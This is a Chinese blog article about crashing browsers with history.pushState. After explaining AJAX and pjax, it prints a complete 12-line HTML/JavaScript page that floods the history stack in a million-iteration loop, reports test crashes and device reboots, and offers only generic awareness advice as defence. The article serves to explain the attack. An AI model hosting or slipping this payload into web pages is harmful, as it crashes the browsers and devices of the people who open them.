让浏览器崩溃的12行JS代码(DoS攻击分析及防御)


Posted in Javascript onOctober 10, 2016

Ajax与pjax

AJAX即“Asynchronous Javascript And XML”(异步JavaScript和XML),是一种用于创建快速动态网页的技术。通过在后台与服务器进行少量数据交换,AJAX可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新-无刷新操作。

但是,ajax应用也会造成另外的问题,容易导致浏览器无法前进与后退,这是个很头疼的问题,开发人员必须增加工作量(比如通过一个隐藏的iframe,或者改变location.hash值等方法)来解决。

为了解决传统ajax带来的问题,HTML5里引入了新的API:history.pushState,它和ajax结合后,有个新的称呼是pjax。是一种基于ajax+history.pushState的新技术,该技术可以无刷新改变页面的内容,并且可以改变页面的URL。pjax是ajax+pushState的封装,同时支持本地存储、动画等多种功能。目前支持jquery、qwrap、kissy等多种版本。

让浏览器崩溃的12行JS代码(DoS攻击分析及防御)

HTML5.history.pushState

HTML5可以通过pushState和replaceState接口操作浏览器历史,并且改变当前页面的URL。

pushState是将指定的URL添加到浏览器历史里,存储当前历史记录点。replaceState是将指定的URL替换当前的URL。同时,这些方法会和window.onpostate事件一起工作。

history.pushState(data, title, url) : 往历史记录堆栈顶部添加一条记录;data会在onpopstate事件触发时作为参数传递过去;title为页面标题,当前所有浏览器一般都会 忽略此参数;url为页面地址,可选,缺省为当前页地址。具体细节:

state?对象是一个JavaScript状态对象,记录历史记录点的额外对象,可以为空。它关系到由pushState()方法创建出来的新的history实体。用以存储关于你所要插入到历史记录的条目的相关信息。

title—所有浏览器一般都会 忽略此参数,虽然它可能将来会被使用上。而现在最安全的使用方式是传一个空字符串,以防止将来的修改,或者可以传一个简短的标题来表示state。

URL—这个参数用来传递新的history实体的URL,新的url必须和现有的url同域,否则pushState()将抛出异常。这个参数是选填的,如果为空,则会被置为document当前的url。

十二行代码分析

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
 total= total+i.toString();
 history.pushState(0,0,total);
}
</script>
</body>
</html>

上面就是十二行代码,关键点在于针对total这个url的循环: history.pushState(0,0,total);不停的在修改url,循环了1000000次,不停的向历史记录堆栈中新增记录,会导致CPU和内存占用率过高以及firefox,chrome,safari浏览器崩溃,而且还能让iPhone重启。

让浏览器崩溃的12行JS代码(DoS攻击分析及防御)

在XP虚拟机(i7单核3.4G、512内存) 亲自实测:

     当上面那个循环次数为十万以上级别的时候,CPU,内存使用率瞬间100%,然后崩溃死机;

     当上面那个循环次数缩小到10000左右的时候,CPU,内存使用率大概在20秒内逐渐升高至100%,然后崩溃死机;

     当上面那个循环次数缩小到500左右的时候, CPU使用率逐渐升高到达100%后,再次瞬间恢复到稳定状态,内存使用从130M左右升高至230M左右,而打开的192.168.56.106/12.html这个页面后,地址栏里面的链接也变成了:http://192.168.56.106/0123456789101112131415161718192021…… 494495496497498499

可见,通过循环不停的向向历史记录堆栈中新增记录的同时,页面会刷新到跳转的新地址,就是循环累加的一个“伪地址”,当这个长度超限的时候,就会引起dos了,攻击的效果和效率完全取决于循环的次数和tagret的硬件配置。

相关的防御

相信大家的安全意识已经非常的强悍了,但是还是要警钟长鸣,不要轻信任何陌生人通过任何方式发给你的链接、附件、邮件、图片等任何信息,当然不排除好基友们损友们的恶作剧了,所以小伙伴儿们记得经常Ctrl+S哦,否则被搞死机了也会很郁闷的。

互联网自诞生之日起,就暴露在黑客攻击之下,早期的黑客攻击多少还带有技术试验和炫耀的目的,但随着全球互联网基础设施规模的壮大、连接的无限增长和用户数的急剧膨胀,黑客攻击频率也相应增加,黑客技术也在不断的发展,逐渐出现了以非法获取经济利益为目的的黑色产业链。针对互联网安全防护的技术水平更是突飞猛进,道高一尺魔高一丈,攻与防,在这个互联网时代每分每秒都正在发生着。

网络安全的防护,七分靠技术,三分靠意识,要防护这些问题,除了依靠安全厂商的产品和服务,还需要不断提高网络安全意识。比如:注意个人密码的管理、注意个人隐私的保护、不要轻易接入公共的wifi、不要轻易相信陌生/熟悉朋友的链接或者文件等、注意移动支付的安全、不要让设备“裸奔”等等

总结

以上就是这篇文章的全部内容了,希望能对大家的学习或者工作带来一定的帮助,如果有疑问大家可以留言交流。

Javascript 相关文章推荐
用js实现多域名不同文件的调用方法
Jan 12 Javascript
jQuery操作input type=radio的实现代码
Jun 14 Javascript
js里取容器大小、定位、距离等属性搜集整理
Aug 19 Javascript
JavaScript检查某个function是否是原生代码的方法
Aug 20 Javascript
CSS3,HTML5和jQuery搜索框集锦
Dec 02 Javascript
Jquery1.9.1源码分析系列(十五)动画处理之外篇
Dec 04 Javascript
Jquery修改image的src属性,图片不加载问题的解决方法
May 17 Javascript
HTML页面,测试JS对C函数的调用简单实例
Aug 09 Javascript
angular.fromJson与toJson方法用法示例
May 17 Javascript
node实现爬虫的几种简易方式
Aug 22 Javascript
VUE项目初建和常见问题总结
Sep 12 Javascript
vue实现element表格里表头信息提示功能(推荐)
Nov 20 Javascript
KnockoutJS 3.X API 第四章之表单value绑定
Oct 10 #Javascript
jquery操作checkbox火狐下第二次无法勾选的解决方法
Oct 10 #Javascript
浅谈jquery中使用canvas的问题
Oct 10 #Javascript
a标签跳转到指定div,jquery添加和移除class属性的实现方法
Oct 10 #Javascript
浅谈javascript控制HTML5的全屏操控,浏览器兼容的问题
Oct 10 #Javascript
js监听键盘事件的方法_原生和jquery的区别详解
Oct 10 #Javascript
js 弹出虚拟键盘修改密码的简单实例
Oct 10 #Javascript
You might like
法兰绒滤网冲泡
2021/03/03 冲泡冲煮
关于页面优化和伪静态
2009/10/11 PHP
php 大数据量及海量数据处理算法总结
2011/05/07 PHP
PHP新手入门学习方法
2011/05/08 PHP
各种快递查询--Api接口
2016/04/26 PHP
CI框架实现优化文件上传及多文件上传的方法
2017/01/04 PHP
PhpStorm本地断点调试的方法步骤
2018/05/21 PHP
表单元素事件 (Form Element Events)
2009/07/17 Javascript
JS特权方法定义作用以及与公有方法的区别
2013/03/18 Javascript
禁止选中文字兼容IE、Chrome、FF等
2013/09/04 Javascript
JavaScript中的运算符种类及其规则介绍
2013/09/26 Javascript
JS中操作JSON总结
2020/12/06 Javascript
JavaScript表格常用操作方法汇总
2015/04/15 Javascript
Bootstrap缩略图与警告框学习使用
2017/02/08 Javascript
使用JavaScript中的lodash编写双色球效果
2018/06/24 Javascript
微信小程序实现登录遮罩效果
2018/11/01 Javascript
vue 之 css module的使用方法
2018/12/04 Javascript
关于js陀螺仪的理解分析
2019/04/11 Javascript
jQuery/JS监听input输入框值变化实例
2019/10/17 jQuery
[02:16]DOTA2超级联赛专访Burning 逆袭需要抓住机会
2013/06/24 DOTA
Python发送form-data请求及拼接form-data内容的方法
2016/03/05 Python
修改默认的pip版本为对应python2.7的方法
2018/11/06 Python
python识别图像并提取文字的实现方法
2019/06/28 Python
python3实现高效的端口扫描
2019/08/31 Python
Python读取yaml文件的详细教程
2020/07/21 Python
详解Python 最短匹配模式
2020/07/29 Python
中国一家专注拼团的社交购物网站:拼多多
2018/06/13 全球购物
CHRONEXT英国:您的首选奢华腕表目的地
2020/03/30 全球购物
一些PHP的面试题
2015/05/06 面试题
运行时异常与一般异常有何异同?
2014/01/05 面试题
机械电子工程毕业生自荐信
2013/11/23 职场文书
大学生个人简历中的自我评价
2013/12/27 职场文书
创先争优活动承诺书
2014/08/30 职场文书
法学专业大学生实习自我鉴定
2014/10/05 职场文书
局机关干部群众路线个人对照检查材料思想汇报
2014/10/05 职场文书
2016高中社会实践心得体会范文
2016/01/14 职场文书